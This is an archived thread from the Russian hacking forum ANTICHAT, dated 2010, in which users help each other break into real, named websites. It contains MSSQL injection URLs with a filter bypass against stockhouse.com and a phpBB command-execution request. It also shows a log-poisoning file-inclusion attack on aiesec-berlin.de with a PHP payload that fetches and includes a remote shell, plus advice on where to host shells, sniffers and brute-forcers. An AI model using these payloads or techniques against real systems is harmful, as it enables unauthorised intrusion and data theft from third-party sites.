ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
21.05.2010, 00:23
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
Сообщение от Konqi
ребят есть сайтег,в общем restore базы phpbb => как всегда profile.php?mode=editprofile&cmd=phpinfo();
интересно то что несколько раз мне нормально выдал phpinfo, а вот сейчас делаю тот же запрос но идет редирект на index.php, или на какой то другой скрипт(vraag.php?url=profile_data.php)
подскажите с чем это может быть связано,что profile.php не работает..
Если не ошибаюсь то код с которым ты восстановил БД через какое то время удаляется!!!
Лично у меня такое было пару раз!!
|
|
|
21.05.2010, 20:37
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от Konqi
ребят есть сайтег,в общем restore базы phpbb => как всегда profile.php?mode=editprofile&cmd=phpinfo();
интересно то что несколько раз мне нормально выдал phpinfo, а вот сейчас делаю тот же запрос но идет редирект на index.php, или на какой то другой скрипт(vraag.php?url=profile_data.php)
подскажите с чем это может быть связано,что profile.php не работает..
UP
|
|
|
|
21.05.2010, 21:09
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
привет, тут у меня вопрос по mssql inj
Код:
http://www.site.com/script.asp?id=convert(int,@@version COLLATE SQL_Latin1_General_Cp1254_CS_AS)--
Код:
Sql Version: Microsoft SQL Server 2005 - 9.00.3042.00 (X64)
Feb 10 2007 00:59:02
Copyright (c) 1988-2005 Microsoft Corporation
Enterprise Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)
попробовал or 1=(select db_name())-- редирект дал.
потом без селекта
Код:
http://www.site.com/script.asp?id=convert(int,db_name() COLLATE SQL_Latin1_General_Cp1254_CS_AS)--
DB Name: SSDB
запрос:
Код:
http://www.site.com/script.asp?id=convert(int,(SELECT TOP 1 cast(name COLLATE SQL_Latin1_General_Cp1254_CS_AS as nvarchar(4000))%2bchar(126) FROM SSDB..sysobjects WHERE xtype=char(85)))--
дает редир 
А ЗАПРОС:
Код:
http://www.site.com/script.asp?id=+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
тоже редирект дает
тут видимо фильтруется select. Кто нит может посоветовать как обходит при таком фильтрации?
заранее спс |
|
|
|
22.05.2010, 10:47
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
Сообщение от YuNi|[c
привет, тут у меня вопрос по mssql inj
Код:
http://www.site.com/script.asp?id=convert(int,@@version COLLATE SQL_Latin1_General_Cp1254_CS_AS)--
Код:
Sql Version: Microsoft SQL Server 2005 - 9.00.3042.00 (X64)
Feb 10 2007 00:59:02
Copyright (c) 1988-2005 Microsoft Corporation
Enterprise Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)
попробовал or 1=(select db_name())-- редирект дал.
потом без селекта
Код:
http://www.site.com/script.asp?id=convert(int,db_name() COLLATE SQL_Latin1_General_Cp1254_CS_AS)--
DB Name: SSDB
запрос:
Код:
http://www.site.com/script.asp?id=convert(int,(SELECT TOP 1 cast(name COLLATE SQL_Latin1_General_Cp1254_CS_AS as nvarchar(4000))%2bchar(126) FROM SSDB..sysobjects WHERE xtype=char(85)))--
дает редир
А ЗАПРОС:
Код:
http://www.site.com/script.asp?id=+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
тоже редирект дает
тут видимо фильтруется select. Кто нит может посоветовать как обходит при таком фильтрации?
заранее спс методом научного тыка:
http://www.stockhouse.com/adredirect.asp?sid=select true
http://www.stockhouse.com/adredirect.asp?sid=+select true
http://www.stockhouse.com/adredirect.asp?sid=select+ false
=> 'select%'
http://www.stockhouse.com/adredirect.asp?sid=(select/**/top+1+table_name+from+information_schema.tables)
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
|
|
|
|
23.05.2010, 21:52
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от l1ght
методом научного тыка:
http://www.stockhouse.com/adredirect.asp?sid=select true
http://www.stockhouse.com/adredirect.asp?sid=+select true
http://www.stockhouse.com/adredirect.asp?sid=select+ false
=> 'select%'
http://www.stockhouse.com/adredirect.asp?sid=(select/**/top+1+table_name+from+information_schema.tables)
спс прошло, но тут как можно выводит инфо с соседных бд а не с текушего?
http://www.stockhouse.com/adredirect.asp?sid=(select/**/top+1+table_name+from+information_schema.tables)--
выводит таблицу с текушего бд Shdb
|
|
|
|
20.05.2010, 20:39
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
чето уже негрузится 
видать пропалили...
http://www.aiesec-berlin.de/KDK/index.php?load=../../../../../../../../../../proc/self/fd/2
а вообще если можно то поподробнее,шелл у тебя вместе с логами грузился?
и что это ты понаписал StSigX15981???????
и в переменные ты заносил $_GET[aa] $_GET[bb] include($_GET[bb]) это что?
хотя я уже догнал
ты присвоил глобальной переменной aa сайт маднета
и проинклудил его... прикольно, но очень паливно
Последний раз редактировалось 547; 20.05.2010 в 20:47..
|
|
|
|
20.05.2010, 20:55
|
|
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме:
264305
Репутация:
30
|
|
Сообщение от 547
чето уже негрузится
видать пропалили...
http://www.aiesec-berlin.de/KDK/index.php?load=../../../../../../../../../../proc/self/fd/2
а вообще если можно то поподробнее,шелл у тебя вместе с логами грузился?
и что это ты понаписал StSigX15981???????
и в переменные ты заносил $_GET[aa] $_GET[bb] include($_GET[bb]) это что?
хотя я уже догнал
ты присвоил глобальной переменной aa сайт маднета
и проинклудил его... прикольно, но очень паливно StSigX15981 - это для визуализации в логах того, что запрос нормально записался
да, шел грузился вместе с логами
паливно да, но это я на скорую руку сделал, по умному надо было бы так:
http://www.aiesec-berlin.de/KDK/index.php?load=<?php if ($_GET[cxc]=1){ob_clean();copy($_GET[axa],$_GET[bxb]);include($_GET[bxb]);}; ?>
ob_clean() или ob_end_clean() - попытка очистить все, что было выведено до начала шела - т.е. чтоб грузился только шел, без этих мегабайтов лога. проверить не успел
|
|
|
|
20.05.2010, 23:50
|
|
Познающий
Регистрация: 31.05.2007
Сообщений: 39
Провел на форуме:
164949
Репутация:
0
|
|
1. Если на сайте есть файл с правами 777, его можно банально прочитать через браузер, но вот можно ли как нибудь внести в него измения не имея доступа по ftp и ssh
2. Интересует такой вопрос при заливке шела откуда лучше всего его заливать? фри хост?
вообще для каких целей какую площадку лучше использовать? Например если написал на пхп парсер, снифер, брутер или ещё что нибудь подобное.
|
|
|
|
21.05.2010, 00:25
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
Сообщение от Demon1X
1. Если на сайте есть файл с правами 777, его можно банально прочитать через браузер, но вот можно ли как нибудь внести в него измения не имея доступа по ftp и ssh
2. Интересует такой вопрос при заливке шела откуда лучше всего его заливать? фри хост?
вообще для каких целей какую площадку лучше использовать? Например если написал на пхп парсер, снифер, брутер или ещё что нибудь подобное.
1. Никак. хоть какие права там будут!
2. Шел без разницы каким макаром заливать!!
Лучше всего когда юзер и группа ROOT, тогда можешь все файлв изменять. Хотя и тут куча разных факторов!
Последний раз редактировалось GOGA075; 21.05.2010 в 00:30..
|
|
|
|
21.05.2010, 01:04
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
DrakonSerg Пробуй
www.........com/admin
www.........com/admin.php
www.........com/admininstrator
и так далее. все писать не буду!
А папка читается видно из-за неграмотности или пофигизма администрации сайта!
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид